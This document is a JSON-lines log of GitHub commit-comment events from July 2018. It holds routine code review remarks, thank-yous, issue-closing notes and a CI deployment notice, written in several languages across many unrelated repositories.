{"id":"7910948196","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"c-osanai/techdrive"},"payload":{"comment":{"id":29576851,"position":11,"line":20,"path":"017/1701.html","commit_id":"eafc12ffb7803c1644d26cbe6dfec94810b18a13","created_at":"2018-07-03T08:13:04Z","updated_at":"2018-07-03T08:13:04Z","author_association":"COLLABORATOR","body":"@c-osanai \r\nおお、とても良いですね！\r\n\r\n実はこちらの想定では sumAge() は result(年齢の合計の数字)を返す実装で\r\n```\r\n$('.result').text('年齢の合計は' + result + 'です。');\r\n```\r\nは関数の外側で実行されるものだったのです。\r\nでも長内さんの実装でも全く問題なさそうです(色々な実装の仕方があって必ず答えは一つではないことがあります)。\r\n\r\n次の課題に進んでみましょう！"}},"created_at":"2018-07-03T08:13:04Z"}
{"id":"7910951358","type":"CommitCommentEvent","actor":{"login":"warrenm"},"repo":{"name":"warrenm/imgui"},"payload":{"comment":{"id":29576858,"position":7,"line":7,"path":"examples/imgui_impl_metal.h","commit_id":"da1b72625310b6e5fc4dbfa056c2d0b36d0f1498","created_at":"2018-07-03T08:13:41Z","updated_at":"2018-07-03T08:13:41Z","author_association":"OWNER","body":"Yes, the protocols and classes can be forward-declared. I've fixed this in the latest commits."}},"created_at":"2018-07-03T08:13:41Z"}
{"id":"7910961400","type":"CommitCommentEvent","actor":{"login":"Gcaufy"},"repo":{"name":"Tencent/wepy"},"payload":{"comment":{"id":29576873,"position":45,"line":242,"path":"packages/wepy/src/component.js","commit_id":"b5b7f7fa66f5d195d7422ae902e0bd2bd817e47c","created_at":"2018-07-03T08:15:42Z","updated_at":"2018-07-03T08:15:42Z","author_association":"COLLABORATOR","body":"https://github.com/Tencent/wepy/issues/1556"}},"created_at":"2018-07-03T08:15:42Z"}
{"id":"7910962170","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"dhall-lang/dhall-nix"},"payload":{"comment":{"id":29576876,"position":7,"line":33,"path":"dhall-nix.cabal","commit_id":"4c7e66bb6a39eaf9c2b888cb51a30965a88d7c75","created_at":"2018-07-03T08:15:52Z","updated_at":"2018-07-03T08:15:52Z","author_association":"NONE","body":"@Gabriel439 in this particular case, it's solved. Maybe worth considering supporting two major versions of Dhall for all the integration packages for the future - to ease the pain of upgrading."}},"created_at":"2018-07-03T08:15:52Z"}
{"id":"7910969544","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29576889,"position":155,"line":376,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:17:23Z","updated_at":"2018-07-03T08:17:23Z","author_association":"NONE","body":"useCamelCasingPlease"}},"created_at":"2018-07-03T08:17:23Z"}
{"id":"7910970391","type":"CommitCommentEvent","actor":{"login":"jarun"},"repo":{"name":"jarun/pdd"},"payload":{"comment":{"id":29576890,"position":null,"line":null,"path":null,"commit_id":"2344deb7e5b465fddb2df054a9078119a59bd70d","created_at":"2018-07-03T08:17:34Z","updated_at":"2018-07-03T08:17:34Z","author_association":"OWNER","body":"Thank you!"}},"created_at":"2018-07-03T08:17:34Z"}
{"id":"7910971157","type":"CommitCommentEvent","actor":{"login":"netskopegittest1"},"repo":{"name":"Scaleskope-Ind/Org_Apic_Auto_Repo"},"payload":{"comment":{"id":29576894,"position":1,"line":1,"path":"new_test_1530605851.txt","commit_id":"64df22e4498d2f66bcde56f0e5c5f0bf8300e01d","created_at":"2018-07-03T08:17:44Z","updated_at":"2018-07-03T08:17:44Z","author_association":"NONE","body":"Needs to be change this!!!"}},"created_at":"2018-07-03T08:17:44Z"}
{"id":"7910973081","type":"CommitCommentEvent","actor":{"login":"katarina11x"},"repo":{"name":"IBM-Bluemix-Docs/iam"},"payload":{"comment":{"id":29576899,"position":null,"line":null,"path":null,"commit_id":"57453bab0ca806358214926900514753eac4a992","created_at":"2018-07-03T08:18:09Z","updated_at":"2018-07-03T08:18:09Z","author_association":"NONE","body":"https://github.com/IBM-Bluemix-Docs/iam/commit/57453bab0ca806358214926900514753eac4a992?short_path=c2fa5b9#diff-c2fa5b9fdaa1978c458cfaad060c6963"}},"created_at":"2018-07-03T08:18:09Z"}
{"id":"7910976248","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29576903,"position":null,"line":null,"path":null,"commit_id":"300bfcb605a0756a3849979e0e35d81a22f1da1a","created_at":"2018-07-03T08:18:46Z","updated_at":"2018-07-03T08:18:46Z","author_association":"COLLABORATOR","body":"Resolves #10 "}},"created_at":"2018-07-03T08:18:46Z"}
{"id":"7910979041","type":"CommitCommentEvent","actor":{"login":"nlhiorth"},"repo":{"name":"usit-gd/mreg"},"payload":{"comment":{"id":29576906,"position":null,"line":null,"path":null,"commit_id":"746ecf136520da6a2fb427e0980706c25b1aba17","created_at":"2018-07-03T08:19:22Z","updated_at":"2018-07-03T08:19:22Z","author_association":"COLLABORATOR","body":"Resolves #8 "}},"created_at":"2018-07-03T08:19:22Z"}
{"id":"7910979132","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29576907,"position":109,"line":335,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:19:23Z","updated_at":"2018-07-03T08:19:23Z","author_association":"NONE","body":"this `j` needs a longer, descriptive name"}},"created_at":"2018-07-03T08:19:23Z"}
{"id":"7910981031","type":"CommitCommentEvent","actor":{"login":"StefanRRichter"},"repo":{"name":"indrc/flink"},"payload":{"comment":{"id":29576913,"position":80,"line":172,"path":"flink-runtime/src/main/java/org/apache/flink/runtime/state/filesystem/FsCheckpointStreamFactory.java","commit_id":"96def47c57ae58f9717ab35d41e1a4bf6d152851","created_at":"2018-07-03T08:19:47Z","updated_at":"2018-07-03T08:19:47Z","author_association":"NONE","body":"I have one more important point that I wanted to talk about which I forgot the last time. Do you see any disadvantage in appending the entropy part always as a subdirectory and after the job id was already added to the path, i.e. `/checkpoint_path/job_id/entropy_string`? The reason is that this would simplify cleanups where we want to drop all checkpoints that belong to a certain job. this would become more difficult if we introduce entropy earlier in the path. What do you think?"}},"created_at":"2018-07-03T08:19:47Z"}
{"id":"7910986704","type":"CommitCommentEvent","actor":{"login":"Vizvezdenec"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29576936,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T08:20:56Z","updated_at":"2018-07-03T08:20:56Z","author_association":"NONE","body":"well commiting this is again guidelines"}},"created_at":"2018-07-03T08:20:56Z"}
{"id":"7910991056","type":"CommitCommentEvent","actor":{"login":"pashagolub"},"repo":{"name":"pashagolub/pglogical"},"payload":{"comment":{"id":29576946,"position":null,"line":null,"path":null,"commit_id":"66e28106817bf309083c3392f9fb4eb22e262820","created_at":"2018-07-03T08:21:50Z","updated_at":"2018-07-03T08:21:50Z","author_association":"OWNER","body":"Sorry, didn't remember exactly :(\r\n"}},"created_at":"2018-07-03T08:21:50Z"}
{"id":"7910992521","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29576947,"position":24,"line":24,"path":"lib/redis/props.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:22:09Z","updated_at":"2018-07-03T08:22:09Z","author_association":"NONE","body":"Setup 里一定会初始化的话，这里应该不需要保护了，直接一个 `attr_reader` 更好吧"}},"created_at":"2018-07-03T08:22:09Z"}
{"id":"7910995634","type":"CommitCommentEvent","actor":{"login":"FONQRI"},"repo":{"name":"FONQRI/UCCP_Server_POCO"},"payload":{"comment":{"id":29576952,"position":78,"line":85,"path":"src/database/database.h","commit_id":"42a2aeac92eff806b9e40a05d8434bcd8822e93f","created_at":"2018-07-03T08:22:43Z","updated_at":"2018-07-03T08:22:43Z","author_association":"OWNER","body":"thanks . edited."}},"created_at":"2018-07-03T08:22:43Z"}
{"id":"7910997140","type":"CommitCommentEvent","actor":{"login":"muleisheng"},"repo":{"name":"muleisheng/apollo"},"payload":{"comment":{"id":29576954,"position":null,"line":null,"path":null,"commit_id":"b4ddd1428524fc157a79bf4c9e10d64fc7c8679c","created_at":"2018-07-03T08:22:59Z","updated_at":"2018-07-03T08:22:59Z","author_association":"OWNER","body":"Changed for reducing one copy operation"}},"created_at":"2018-07-03T08:22:59Z"}
{"id":"7910998016","type":"CommitCommentEvent","actor":{"login":"xenerizes"},"repo":{"name":"xenerizes/models"},"payload":{"comment":{"id":29576955,"position":null,"line":null,"path":null,"commit_id":"4dfb5debc7c0831f2d4de6b23721033c244b0d2c","created_at":"2018-07-03T08:23:10Z","updated_at":"2018-07-03T08:23:10Z","author_association":"OWNER","body":"@turkertopal, as far as I remember, there are two types of UDF: socket-based and process-based. If you use a socket-based one, you will need to point only the socket file, otherwise you will have to specify the path to your program (Kapacitor starts it as subprocess). My solution is socket-based. It means that you should create the pointed socket file (not sure about the influence of its contents, only about existence), then start your program manually, and only after that you are able to start Kapacitor so it connects to ARIMA via socket correctly.\r\n\r\nI'm sure that all the information is present in Kapacitor documentation (or you can guess the details). If there is nothing helpful in Python example, you can get everything from other examples. The structure of Go example UDFs is very similar, and config files have exactly the same fields."}},"created_at":"2018-07-03T08:23:10Z"}
{"id":"7910999465","type":"CommitCommentEvent","actor":{"login":"dspinellis"},"repo":{"name":"dspinellis/git-issue"},"payload":{"comment":{"id":29576958,"position":null,"line":null,"path":null,"commit_id":"e7f8a22e93e98e4f39527466aab6b2940b68d603","created_at":"2018-07-03T08:23:28Z","updated_at":"2018-07-03T08:23:28Z","author_association":"OWNER","body":"LGTM. Please note that running sync-docs should result in an empty git-status."}},"created_at":"2018-07-03T08:23:28Z"}
{"id":"7911026597","type":"CommitCommentEvent","actor":{"login":"ViktorMalesevic"},"repo":{"name":"pmorissette/ffn"},"payload":{"comment":{"id":29577039,"position":null,"line":null,"path":null,"commit_id":"8c2fdf3c15ff32f6ce860509b7929a9ccdf91811","created_at":"2018-07-03T08:28:47Z","updated_at":"2018-07-03T08:28:47Z","author_association":"CONTRIBUTOR","body":"Quick correction: it was \"six_month\", \"three_year\", \"five_year\" and \"ten_year\""}},"created_at":"2018-07-03T08:28:47Z"}
{"id":"7911035121","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577059,"position":134,"line":360,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:30:26Z","updated_at":"2018-07-03T08:30:26Z","author_association":"NONE","body":"can be const"}},"created_at":"2018-07-03T08:30:26Z"}
{"id":"7911036982","type":"CommitCommentEvent","actor":{"login":"symphonyh"},"repo":{"name":"hugoferreira/papyrus-theme"},"payload":{"comment":{"id":29577063,"position":null,"line":null,"path":null,"commit_id":"282d0fb650b0f6302d1d799c76b7c767d3963e1b","created_at":"2018-07-03T08:30:47Z","updated_at":"2018-07-03T08:30:47Z","author_association":"NONE","body":"Have you seen the “http://hugosereno.eu/ ”template? Is there an update? Hope to get a latest version, Thank you."}},"created_at":"2018-07-03T08:30:47Z"}
{"id":"7911038555","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577065,"position":67,"line":323,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:31:05Z","updated_at":"2018-07-03T08:31:05Z","author_association":"NONE","body":"actually, findTopHierarchy should have a parameter or two"}},"created_at":"2018-07-03T08:31:05Z"}
{"id":"7911039170","type":"CommitCommentEvent","actor":{"login":"zcorpan"},"repo":{"name":"whatwg/html"},"payload":{"comment":{"id":29577066,"position":null,"line":null,"path":null,"commit_id":"4e9c466713c4ce8e07a55effaf2a6f4bfd42669c","created_at":"2018-07-03T08:31:12Z","updated_at":"2018-07-03T08:31:12Z","author_association":"MEMBER","body":"This was not a typo."}},"created_at":"2018-07-03T08:31:12Z"}
{"id":"7911044451","type":"CommitCommentEvent","actor":{"login":"ErwanAliasr1"},"repo":{"name":"ceph/ceph-build"},"payload":{"comment":{"id":29577068,"position":15,"line":53,"path":"ceph-ansible-pr-syntax-check/build/build","commit_id":"f372b34ff060ed651017fbce1d1a4ff8ea742c08","created_at":"2018-07-03T08:32:12Z","updated_at":"2018-07-03T08:32:12Z","author_association":"CONTRIBUTOR","body":"Can you explicit where this ghprbTargetBranch variable is coming from ?"}},"created_at":"2018-07-03T08:32:12Z"}
{"id":"7911044591","type":"CommitCommentEvent","actor":{"login":"Liante-0216"},"repo":{"name":"Liante-0216/Liante-Cogs"},"payload":{"comment":{"id":29577069,"position":null,"line":null,"path":null,"commit_id":"cdc88ca41b350c4ac719b34a295e298758ba276a","created_at":"2018-07-03T08:32:13Z","updated_at":"2018-07-03T08:32:13Z","author_association":"OWNER","body":"closes #3 "}},"created_at":"2018-07-03T08:32:13Z"}
{"id":"7911045026","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577070,"position":73,"line":73,"path":"lib/redis/props.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:32:18Z","updated_at":"2018-07-03T08:32:18Z","author_association":"NONE","body":"`redis_field_redis` 这名字有点怪啊"}},"created_at":"2018-07-03T08:32:18Z"}
{"id":"7911049891","type":"CommitCommentEvent","actor":{"login":"narcolepticinsomniac"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29577076,"position":null,"line":null,"path":null,"commit_id":"d63d22eeaf61c38353550de93dc769d6902b31f9","created_at":"2018-07-03T08:33:13Z","updated_at":"2018-07-03T08:33:13Z","author_association":"MEMBER","body":"Also has another wrap for filters. I gotta update the html though."}},"created_at":"2018-07-03T08:33:13Z"}
{"id":"7911050305","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"Respect/Validation"},"payload":{"comment":{"id":29577081,"position":null,"line":null,"path":null,"commit_id":"57f8a8aad0d34f304629eb1f0edb0aeb1c1e70c8","created_at":"2018-07-03T08:33:18Z","updated_at":"2018-07-03T08:33:18Z","author_association":"MEMBER","body":"> Hey, man! This is not the best place,\r\n\r\n@henriquemoody Seem to work =) wd\r\n\r\n>  but I've been trying to reach you out on Hangouts, but with not success so far 😅. How can I talk to you?!\r\n\r\nOh crap...My  bad... hangouts should work again.\r\n"}},"created_at":"2018-07-03T08:33:18Z"}
{"id":"7911051752","type":"CommitCommentEvent","actor":{"login":"Alex-302"},"repo":{"name":"AdguardTeam/AdguardFilters"},"payload":{"comment":{"id":29577082,"position":4,"line":36,"path":"EnglishFilter/sections/general_elemhide.txt","commit_id":"63e316a68cc8d07f7e772bce175d930e79fec49a","created_at":"2018-07-03T08:33:36Z","updated_at":"2018-07-03T08:33:36Z","author_association":"MEMBER","body":"It this URL popular?"}},"created_at":"2018-07-03T08:33:36Z"}
{"id":"7911052047","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577084,"position":114,"line":340,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:33:40Z","updated_at":"2018-07-03T08:33:40Z","author_association":"NONE","body":"can be for...of..."}},"created_at":"2018-07-03T08:33:40Z"}
{"id":"7911058601","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Splitter"},"payload":{"comment":{"id":29577108,"position":47,"line":35,"path":"contracts/Splitter.sol","commit_id":"c4949ebf1726bec392800646f352dd4c8b36e417","created_at":"2018-07-03T08:34:53Z","updated_at":"2018-07-03T08:34:53Z","author_association":"NONE","body":"I am not sure how Rob's comment implies a `uint fundsSent = msg.value;`. \r\n\r\nAs for whether `half = msg.value / 2;` is cheaper than using `msg.value / 2` everywhere, I am not sure. This is worth experimenting and finding out the difference, later, when your contract is robust. No need to prematurely optimise for so little."}},"created_at":"2018-07-03T08:34:53Z"}
{"id":"7911059649","type":"CommitCommentEvent","actor":{"login":"jiangnenghua"},"repo":{"name":"jiangnenghua/spring-boot-starters"},"payload":{"comment":{"id":29577112,"position":null,"line":null,"path":null,"commit_id":"3854429dd5ee59b878c786e3d3520acbaa40e2ec","created_at":"2018-07-03T08:35:07Z","updated_at":"2018-07-03T08:35:07Z","author_association":"OWNER","body":"fix #1 "}},"created_at":"2018-07-03T08:35:07Z"}
{"id":"7911067039","type":"CommitCommentEvent","actor":{"login":"mydongistiny"},"repo":{"name":"BenzoRom/frameworks_base"},"payload":{"comment":{"id":29577128,"position":null,"line":null,"path":null,"commit_id":"96ad58b34eb7d1e50fce74e55d8f3ab306953c94","created_at":"2018-07-03T08:36:29Z","updated_at":"2018-07-03T08:36:29Z","author_association":"CONTRIBUTOR","body":"Well I got problems with INVISIBLE and used GONE and it works fine as far as I can tell"}},"created_at":"2018-07-03T08:36:29Z"}
{"id":"7911068989","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577136,"position":116,"line":342,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:36:52Z","updated_at":"2018-07-03T08:36:52Z","author_association":"NONE","body":"might be 0 at the top of the hierarchy"}},"created_at":"2018-07-03T08:36:52Z"}
{"id":"7911070946","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29577147,"position":null,"line":null,"path":null,"commit_id":"e1826ac04d141562556eb0865c59ee076bfade9a","created_at":"2018-07-03T08:37:15Z","updated_at":"2018-07-03T08:37:15Z","author_association":"OWNER","body":"commit index.html"}},"created_at":"2018-07-03T08:37:15Z"}
{"id":"7911073146","type":"CommitCommentEvent","actor":{"login":"acellary"},"repo":{"name":"symfony/symfony"},"payload":{"comment":{"id":29577154,"position":null,"line":null,"path":null,"commit_id":"c056a9c426af43920e543eaedc66fe919f0ae838","created_at":"2018-07-03T08:37:41Z","updated_at":"2018-07-03T08:37:41Z","author_association":"NONE","body":"interesting"}},"created_at":"2018-07-03T08:37:41Z"}
{"id":"7911074897","type":"CommitCommentEvent","actor":{"login":"phamloi7710"},"repo":{"name":"phamloi7710/dientu"},"payload":{"comment":{"id":29577157,"position":63,"line":63,"path":"app/Http/Controllers/Admin/LanguageController.php","commit_id":"a6208b958eaeef77b9316ed8dca9d140cd43a001","created_at":"2018-07-03T08:38:02Z","updated_at":"2018-07-03T08:38:02Z","author_association":"OWNER","body":"Ấu dè"}},"created_at":"2018-07-03T08:38:02Z"}
{"id":"7911074932","type":"CommitCommentEvent","actor":{"login":"UncleJo2y"},"repo":{"name":"TheThreeDog/Auto-Lianliankan"},"payload":{"comment":{"id":29577158,"position":null,"line":null,"path":null,"commit_id":"5bf7f1bbc6e38223f4213e8742ef098b3dad9769","created_at":"2018-07-03T08:38:03Z","updated_at":"2018-07-03T08:38:03Z","author_association":"NONE","body":"1111"}},"created_at":"2018-07-03T08:38:03Z"}
{"id":"7911084734","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577188,"position":34,"line":34,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:39:56Z","updated_at":"2018-07-03T08:39:56Z","author_association":"NONE","body":"`prop_defined?` 更好了"}},"created_at":"2018-07-03T08:39:56Z"}
{"id":"7911086705","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577196,"position":45,"line":45,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:40:19Z","updated_at":"2018-07-03T08:40:19Z","author_association":"NONE","body":"`prop_type`"}},"created_at":"2018-07-03T08:40:19Z"}
{"id":"7911088167","type":"CommitCommentEvent","actor":{"login":"wagner-certat"},"repo":{"name":"certat/do-portal"},"payload":{"comment":{"id":29577199,"position":null,"line":null,"path":null,"commit_id":"06ea5cdd38154dbe14665d900e99cf94aec60876","created_at":"2018-07-03T08:40:36Z","updated_at":"2018-07-03T08:40:36Z","author_association":"MEMBER","body":"All our changes are in the branches topic-postgres and topic-ip-asn, not in master"}},"created_at":"2018-07-03T08:40:36Z"}
{"id":"7911088929","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577202,"position":56,"line":56,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:40:45Z","updated_at":"2018-07-03T08:40:45Z","author_association":"NONE","body":"`prop_redis_pool`"}},"created_at":"2018-07-03T08:40:45Z"}
{"id":"7911091253","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577203,"position":109,"line":335,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:41:11Z","updated_at":"2018-07-03T08:41:11Z","author_association":"NONE","body":"it probably needs to be declared inside the for loop a few lines down"}},"created_at":"2018-07-03T08:41:11Z"}
{"id":"7911094838","type":"CommitCommentEvent","actor":{"login":"NKONSTANTAKIS"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":29577211,"position":null,"line":null,"path":null,"commit_id":"f63c2e1db7c65db8776fb469093e7befd0ae0004","created_at":"2018-07-03T08:41:53Z","updated_at":"2018-07-03T08:41:53Z","author_association":"NONE","body":"I think we should consider those combination patches individually. The guide is just a guide, its not the word of God or something. If we disregard it completely arnarchy happens and its not good, but if we worship the rules we are bound to miss good opportunities. Nowadays elo is not easy to find, if the combo patches are not complexifying the code too much I think its worth it. In any case every situation should be judged individually."}},"created_at":"2018-07-03T08:41:53Z"}
{"id":"7911095212","type":"CommitCommentEvent","actor":{"login":"jacekkopecky"},"repo":{"name":"Robinson38/DiagramGeneration"},"payload":{"comment":{"id":29577216,"position":131,"line":357,"path":"generate_SUMS_diagram_SVG.js","commit_id":"862ae2263ceafb9ada8c1a3ba688fd8a7b69d9bd","created_at":"2018-07-03T08:41:57Z","updated_at":"2018-07-03T08:41:57Z","author_association":"NONE","body":"don't run this inside three nested loops"}},"created_at":"2018-07-03T08:41:57Z"}
{"id":"7911095340","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577218,"position":74,"line":74,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:41:58Z","updated_at":"2018-07-03T08:41:58Z","author_association":"NONE","body":"这个应该就是 key ，不是 prefix 了吧,\r\n\r\n`prop_redis_key`"}},"created_at":"2018-07-03T08:41:58Z"}
{"id":"7911097527","type":"CommitCommentEvent","actor":{"login":"larryzhao"},"repo":{"name":"xuncheng/redis-props"},"payload":{"comment":{"id":29577221,"position":94,"line":94,"path":"lib/redis/props/helper.rb","commit_id":"a9dd1c8cc800f8663e2334e462e7b3c5dc29eba7","created_at":"2018-07-03T08:42:22Z","updated_at":"2018-07-03T08:42:22Z","author_association":"NONE","body":"不是一个 hash 了么"}},"created_at":"2018-07-03T08:42:22Z"}
{"id":"7911099359","type":"CommitCommentEvent","actor":{"login":"Ronimeister"},"repo":{"name":"Ronimeister/NET.S.2018.Kanunnikov.03"},"payload":{"comment":{"id":29577227,"position":73,"line":73,"path":"Algorithms/RootFinder.cs","commit_id":"250a37a09dc9a469aca4deb1545994e430d6d2ea","created_at":"2018-07-03T08:42:43Z","updated_at":"2018-07-03T08:42:43Z","author_association":"OWNER","body":"Здравствуйте,понял - исправлю.\n\n2018-07-01 17:15 GMT+03:00 Anzhelika Kravchuk <notifications@github.com>:\n\n> Если уж выделили это как функцию, то проситься\n> private static double SetNewIterationValue(double current, int power,\n> double number)\n> => (((power - 1) * current) + (number / Math.Pow(current, power - 1))) /\n> power;\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ronimeister/NET.S.2018.Kanunnikov.03/commit/250a37a09dc9a469aca4deb1545994e430d6d2ea#commitcomment-29558141>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeM1XoZUmc59kkwMUiamJAMQbsXNBFUxks5uCNlrgaJpZM4U-Vou>\n> .\n>\n"}},"created_at":"2018-07-03T08:42:43Z"}
{"id":"7911100617","type":"CommitCommentEvent","actor":{"login":"adad553"},"repo":{"name":"adad553/ahn"},"payload":{"comment":{"id":29577229,"position":null,"line":null,"path":null,"commit_id":"0f88c078a2b52da8474c801805dd987f66cd3264","created_at":"2018-07-03T08:42:58Z","updated_at":"2018-07-03T08:42:58Z","author_association":"OWNER","body":"어렵다\r\n"}},"created_at":"2018-07-03T08:42:58Z"}
{"id":"7911103450","type":"CommitCommentEvent","actor":{"login":"king4k1"},"repo":{"name":"king4k1/kma-ggplot"},"payload":{"comment":{"id":29577232,"position":null,"line":null,"path":null,"commit_id":"32a7b2391f2040314a1adeaefa7b5ec410d0e2ec","created_at":"2018-07-03T08:43:31Z","updated_at":"2018-07-03T08:43:31Z","author_association":"OWNER","body":"[kr-issue-monitor-17.pdf.pdf](https://github.com/king4k1/kma-ggplot/files/2158400/kr-issue-monitor-17.pdf.pdf)\r\n\r\n렌터카 회사의 고민 ?\r\n고객의 대기시간\r\np.10,11 "}},"created_at":"2018-07-03T08:43:31Z"}
{"id":"7911106127","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"lede-project/source"},"payload":{"comment":{"id":29577236,"position":null,"line":null,"path":null,"commit_id":"e705342bf8cf1e5c2c1750cf50ab3cf04cc2e080","created_at":"2018-07-03T08:44:01Z","updated_at":"2018-07-03T08:44:01Z","author_association":"CONTRIBUTOR","body":"@dedeckeh \r\nInstead of cloning this huge repo wouldn't it be better to use the mirror's snapshot feature instead?\r\nhttps://sourceware.org/glibc/wiki/GlibcGit\r\nhttp://repo.or.cz/glibc.git/shortlog/refs/heads/release/2.26/master\r\n"}},"created_at":"2018-07-03T08:44:01Z"}
{"id":"7911108719","type":"CommitCommentEvent","actor":{"login":"kulsingh"},"repo":{"name":"WDAqua/Frankenstein"},"payload":{"comment":{"id":29577243,"position":null,"line":null,"path":null,"commit_id":"6edcd8a4349d08b97623d1fcc77179cbedd0483a","created_at":"2018-07-03T08:44:32Z","updated_at":"2018-07-03T08:44:32Z","author_association":"CONTRIBUTOR","body":"commit this one"}},"created_at":"2018-07-03T08:44:32Z"}
{"id":"7911112077","type":"CommitCommentEvent","actor":{"login":"diizzyy"},"repo":{"name":"openwrt/openwrt"},"payload":{"comment":{"id":29577249,"position":null,"line":null,"path":null,"commit_id":"e705342bf8cf1e5c2c1750cf50ab3cf04cc2e080","created_at":"2018-07-03T08:45:11Z","updated_at":"2018-07-03T08:45:11Z","author_association":"CONTRIBUTOR","body":"@dedeckeh \r\nInstead of cloning this huge repo wouldn't it be better to use the mirror's snapshot feature instead?\r\nhttps://sourceware.org/glibc/wiki/GlibcGit\r\nhttp://repo.or.cz/glibc.git/shortlog/refs/heads/release/2.26/master"}},"created_at":"2018-07-03T08:45:11Z"}
{"id":"7911113438","type":"CommitCommentEvent","actor":{"login":"ngph1"},"repo":{"name":"ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609"},"payload":{"comment":{"id":29577254,"position":null,"line":null,"path":null,"commit_id":"6af40874f51706d41baaca9d25ed50b492f56710","created_at":"2018-07-03T08:45:26Z","updated_at":"2018-07-03T08:45:26Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/ada15128-1189-488e-a2d8-e35d9e878577?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180702091319609\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/fc2b99ed-f195-4a70-9b20-62316c9f9855?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180702091319609\") deployed [sample-cloud-native-toolchain-tutorial-20180702091319609](https://github.com/ngph1/sample-cloud-native-toolchain-tutorial-20180702091319609/releases/tag/deploy-ibm-yp-us-south-PH-DP-Org-test-20180703-084525 \"deploy-ibm-yp-us-south-PH-DP-Org-test-20180703-084525\") to [test](https://console.bluemix.net/apps/9d151ec0-dbca-42f0-8896-3c12334ca5ec?env_id=ibm:yp:us-south \"ibm:yp:us-south:PH DP Org:test\"), including this commit"}},"created_at":"2018-07-03T08:45:26Z"}
